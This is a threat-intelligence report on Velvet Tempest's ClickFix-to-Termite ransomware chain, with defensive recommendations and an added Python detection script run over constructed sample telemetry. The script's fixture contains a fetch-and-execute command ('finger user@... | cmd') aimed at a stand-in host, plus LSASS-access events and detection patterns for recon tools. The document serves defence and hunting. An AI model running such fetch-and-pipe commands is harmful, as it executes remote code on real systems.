Velvet Tempest Operationalizes ClickFix as a Ransomware Delivery Engine
Cybersecurity researchers have linked a wave of Termite ransomware breaches to a sophisticated campaign by Velvet Tempest, a financially motivated threat actor tracked by Microsoft. The group is exploiting the ClickFix social-engineering technique to achieve initial access, then pivoting rapidly through DonutLoader and the CastleRAT backdoor before deploying double-extortion ransomware.
The campaign marks a significant evolution in ClickFix tradecraft — what began as a phishing lure to deliver infostealers is now being weaponized as the entry point for enterprise-scale ransomware operations.
Incident Details
| Attribute | Value |
|---|---|
| Threat Actor | Velvet Tempest (Microsoft tracking designation) |
| Ransomware Family | Termite |
| Initial Access | ClickFix social engineering via malvertising lures |
| Loaders Used | DonutLoader, native Windows utilities (finger.exe, cmd.exe) |
| Backdoor | CastleRAT (C and Python variants) |
| C2 Mechanism | Steam Community profile pages (dead-drop) + dedicated C2 domains |
| Extortion Model | Double extortion — data exfiltration prior to encryption |
| Known Prior Victims | Blue Yonder, Genea |
| Disclosure Date | March 7, 2026 |
How the Attack Works
Phase 1 — ClickFix Initial Access
ClickFix is a social-engineering technique that tricks users into manually executing malware by disguising malicious commands as routine troubleshooting steps. Velvet Tempest's lures direct victims to a malvertising page or compromised site that displays a fake verification or captcha prompt.
The victim is instructed to open the Windows Run dialog (Win+R) and paste in what appears to be a harmless command. The obfuscated command actually spawns a chain of nested cmd.exe processes and leverages finger.exe — a legacy TCP/79 utility present on all Windows systems — to pull initial payload loaders from attacker-controlled infrastructure.
This technique is effective because it exploits procedural trust: users who have performed IT troubleshooting steps before may not recognize that they are manually executing arbitrary code on their own system.
Phase 2 — DonutLoader Staging
The initial access payload drops DonutLoader, a shellcode-based loader that decrypts and executes its payloads entirely in memory, without writing them to disk. This fileless execution defeats antivirus and EDR controls that depend on scanning files written to disk, so detection has to come from behavioral telemetry (process injection, unbacked executable memory, anomalous child processes) rather than file hashes.
DonutLoader then retrieves and injects CastleRAT, the group's primary backdoor, into a legitimate host process.
Phase 3 — CastleRAT Persistence and Reconnaissance
CastleRAT is a feature-rich remote access trojan available in both C and Python variants. It is attributed to TAG150, the threat cluster whose infrastructure is operated by the developers of CastleLoader. Key CastleRAT capabilities include:
- Persistent reverse shell with encrypted communications
- C2 beaconing via Steam Community profile pages as a dead-drop resolver (legitimate domain, harder to block)
- Dedicated C2 domain fallback with domain-fronting support
- Credential harvesting and browser data exfiltration
- Lateral movement via Pass-the-Hash and token impersonation
Phase 4 — Pre-Ransomware Recon and Data Theft
Before deploying ransomware, the operator conducts deliberate hands-on-keyboard activity:
- Network and host reconnaissance
- Active Directory enumeration
- Credential theft (LSASS dumping, credential store harvesting)
- Drive and share enumeration to identify high-value data repositories
- Bulk data exfiltration to attacker-controlled staging servers
This sequence — recon + credential theft + drive enumeration — should be treated as a pre-ransomware kill-chain indicator. Organizations that detect these behaviors in sequence have a narrow window to contain the breach before encryption begins.
Phase 5 — Termite Ransomware Deployment
Termite ransomware is deployed as the final stage. Velvet Tempest practices double extortion: stolen data is used as additional leverage, threatening publication on a leak site if ransom demands are not met. This approach has proven effective against large enterprises, including prior victims Blue Yonder (a supply chain management company) and Genea (an Australian healthcare provider).
Impact Assessment
| Impact Area | Description |
|---|---|
| Business Operations | Full file system encryption causes operational shutdown |
| Data Confidentiality | Exfiltrated data subject to public exposure |
| Financial | Ransom demands in the millions; recovery costs additional |
| Reputational | Customer data exposure and operational outages damage brand trust |
| Supply Chain | Prior victims include logistics and healthcare operators |
Recommendations
For Security Operations
- Hunt for ClickFix lure patterns — monitor proxy/DNS logs for visits to domains hosting fake captcha/verification pages; look for unusual `cmd.exe` child process trees, in particular `cmd.exe` spawned by `explorer.exe` (the parent of anything launched from the Run dialog) that in turn launches `finger.exe`
- Flag `finger.exe` usage — `finger.exe` network activity is highly anomalous in enterprise environments; alert on any outbound TCP/79 connection from a workstation
- Detect DonutLoader injection — monitor for in-memory shellcode execution, particularly `cmd.exe` or `powershell.exe` spawning a legitimate process that is then hollowed or injected into
- Block Steam Community as C2 — implement URL categorization that flags repeated `steamcommunity.com` profile-page requests, especially from non-browser processes, as potential C2 dead-drop activity in corporate environments
- Alert on pre-ransomware recon TTPs — LSASS access, `net view`, `nltest`, and large SMB share reads occurring on the same host within a short time window are high-confidence ransomware precursors
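The pre-ransomware sequence described in Phase 4 and the hunting guidance above, as an added Python example that is not part of the original report or of any Microsoft tooling. It runs three checks over constructed, Sysmon-style sample events (every host name, timestamp, IP address, URL and process name is made up for illustration, and the injected host process, poll threshold and 30-minute window are assumptions to tune per environment): `finger.exe` or TCP/79 activity, repeated polling of one Steam Community profile, and recon plus LSASS access plus share enumeration landing on one host inside a single window.

```python
"""Hunting logic for the ClickFix -> finger.exe -> CastleRAT -> Termite chain.
Added example, not from the original report or from Microsoft. Events are
simplified Sysmon-style dicts; every host, timestamp, IP, URL and process
name below is constructed sample data."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

SAMPLE_EVENTS = [
    # Phase 1 on WS01: Win+R paste -> explorer spawns cmd, nested cmd runs finger.exe over TCP/79
    {"ts": "2026-03-02T09:14:02", "host": "WS01", "type": "process", "image": "cmd.exe",
     "parent": "explorer.exe", "cmdline": 'cmd /c cmd /c "finger user@203.0.113.10 | cmd"'},
    {"ts": "2026-03-02T09:14:03", "host": "WS01", "type": "process", "image": "finger.exe",
     "parent": "cmd.exe", "cmdline": "finger user@203.0.113.10"},
    {"ts": "2026-03-02T09:14:03", "host": "WS01", "type": "network", "image": "finger.exe",
     "dst": "203.0.113.10", "dst_port": 79},
    # Phase 3: CastleRAT polling one Steam profile from an injected host process (process name assumed)
    *[{"ts": f"2026-03-02T09:{m}:00", "host": "WS01", "type": "web", "image": "RuntimeBroker.exe",
       "url": "https://steamcommunity.com/profiles/76561199000000000"} for m in ("20", "25", "30")],
    # Phase 4: AD recon, LSASS access and share enumeration within 20 minutes
    {"ts": "2026-03-02T10:01:10", "host": "WS01", "type": "process", "image": "nltest.exe",
     "parent": "cmd.exe", "cmdline": "nltest /dclist:corp"},
    {"ts": "2026-03-02T10:03:45", "host": "WS01", "type": "process_access", "image": "rundll32.exe",
     "target": "lsass.exe", "access": "0x1FFFFF"},
    {"ts": "2026-03-02T10:18:30", "host": "WS01", "type": "process", "image": "net.exe",
     "parent": "cmd.exe", "cmdline": "net view \\\\FS01 /all"},
    # WS02 is benign: one share listing and a visit to the Steam store front page
    {"ts": "2026-03-02T12:00:00", "host": "WS02", "type": "web", "image": "chrome.exe",
     "url": "https://store.steampowered.com/"},
    {"ts": "2026-03-02T12:05:00", "host": "WS02", "type": "process", "image": "net.exe",
     "parent": "cmd.exe", "cmdline": "net view \\\\FS01"},
]
PRECURSOR_CATEGORIES = {"recon", "credential_theft", "drive_enum"}

def _ts(event):
    return datetime.fromisoformat(event["ts"])

def detect_finger(events):
    """finger.exe is essentially noise-free on workstations: flag the Run-dialog cmd chain
    that invokes it, its execution, and any outbound TCP/79 connection."""
    hits = []
    for e in events:
        img = e["image"].lower()
        if e["type"] == "process" and img == "cmd.exe" and e["parent"].lower() == "explorer.exe" \
                and "finger" in e["cmdline"].lower():
            hits.append(f'{e["host"]}: Run-dialog cmd chain invoking finger: {e["cmdline"]}')
        elif e["type"] == "process" and img == "finger.exe":
            hits.append(f'{e["host"]}: finger.exe spawned by {e["parent"]}')
        elif e["type"] == "network" and e.get("dst_port") == 79:
            hits.append(f'{e["host"]}: outbound TCP/79 from {e["image"]} to {e["dst"]}')
    return hits

def is_steam_profile(url):
    """True for steamcommunity.com profile pages (/profiles/<id> or /id/<vanity>)."""
    p = urlparse(url)
    return p.hostname == "steamcommunity.com" and p.path.startswith(("/profiles/", "/id/"))

def detect_steam_dead_drop(events, min_polls=3):
    """Repeated fetches of the same Steam profile by one process on one host.
    The threshold is an assumption; a user opening a profile once will not reach it."""
    polls = defaultdict(int)
    for e in events:
        if e["type"] == "web" and is_steam_profile(e["url"]):
            polls[(e["host"], e["image"], e["url"])] += 1
    return [f"{h}: {img} fetched {url} {n} times" for (h, img, url), n in polls.items() if n >= min_polls]

def classify_precursor(e):
    """Map one event to a pre-ransomware category, or None if it is not a precursor."""
    if e["type"] == "process_access" and e.get("target", "").lower() == "lsass.exe":
        return "credential_theft"
    if e["type"] == "process":
        img, cmd = e["image"].lower(), e.get("cmdline", "").lower()
        if img == "nltest.exe" or (img == "net.exe" and (" group " in cmd or "/domain" in cmd)):
            return "recon"
        if img == "net.exe" and any(k in cmd for k in (" view", " share", " use ")):
            return "drive_enum"
    return None

def detect_preransomware_sequence(events, window=timedelta(minutes=30)):
    """Alert once per host when all three categories occur inside one sliding window."""
    by_host = defaultdict(list)
    for e in events:
        cat = classify_precursor(e)
        if cat:
            by_host[e["host"]].append((_ts(e), cat))
    alerts = []
    for host, items in sorted(by_host.items()):
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {c for t, c in items[i:] if t - start <= window}
            if PRECURSOR_CATEGORIES <= seen:
                alerts.append({"host": host, "window_start": start.isoformat(), "categories": sorted(seen)})
                break  # one alert per host is enough to open an incident
    return alerts

def run_hunt(events=SAMPLE_EVENTS):
    return {"finger": detect_finger(events),
            "steam_dead_drop": detect_steam_dead_drop(events),
            "pre_ransomware": detect_preransomware_sequence(events)}

if __name__ == "__main__":
    for name, hits in run_hunt().items():
        print(f"[{name}] {len(hits)} hit(s):", *hits, sep="\n    ")
```

Against the sample data only WS01 fires: three `finger` hits (the Run-dialog chain, the `finger.exe` process and the TCP/79 connection), one dead-drop hit for the profile fetched three times, and one pre-ransomware alert whose window opens at the `nltest` run. WS02's single `net view` and Steam store visit produce nothing, which is the behaviour to keep when tuning the thresholds against real telemetry.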
For Endpoint Defense
- Disable `finger.exe` via application allowlisting (an AppLocker or WDAC deny rule on the binary), or remove it where it is not operationally required
- Enable Attack Surface Reduction (ASR) rules in Microsoft Defender, particularly the rule blocking credential stealing from the Windows local security authority subsystem (LSASS), which directly targets the Phase 4 credential theft step, and the rules blocking child process creation from Office applications
- Deploy EDR behavioral detection for in-memory payload injection, especially DonutLoader's reflective loading technique
For Users
- Never paste commands from websites, emails, or pop-up prompts into the Windows Run dialog, PowerShell, or Command Prompt — legitimate software never requires this
- Report fake "verification" prompts immediately to your security team
Key Takeaways
- ClickFix is now a ransomware delivery channel — organizations should elevate ClickFix from an infostealer-tier threat to a ransomware precursor requiring incident-level response
- Velvet Tempest moves quickly — the documented TTPs show the group transitioning from initial ClickFix lure to hands-on-keyboard recon within hours of first access
- CastleRAT's Steam dead-drop is a detection challenge — network controls that block unknown C2 domains will not catch Steam Community profile polling without explicit URL-level inspection
- finger.exe is a reliable IOC — TCP/79 outbound traffic from Windows workstations is essentially noise-free in modern environments, making it a high-fidelity detection opportunity
- Pre-ransomware behaviors are the intervention window — detecting recon + credential theft + drive enumeration is the last opportunity to prevent encryption
- Double extortion amplifies impact — even organizations with robust backups face data exposure liability when Termite is involved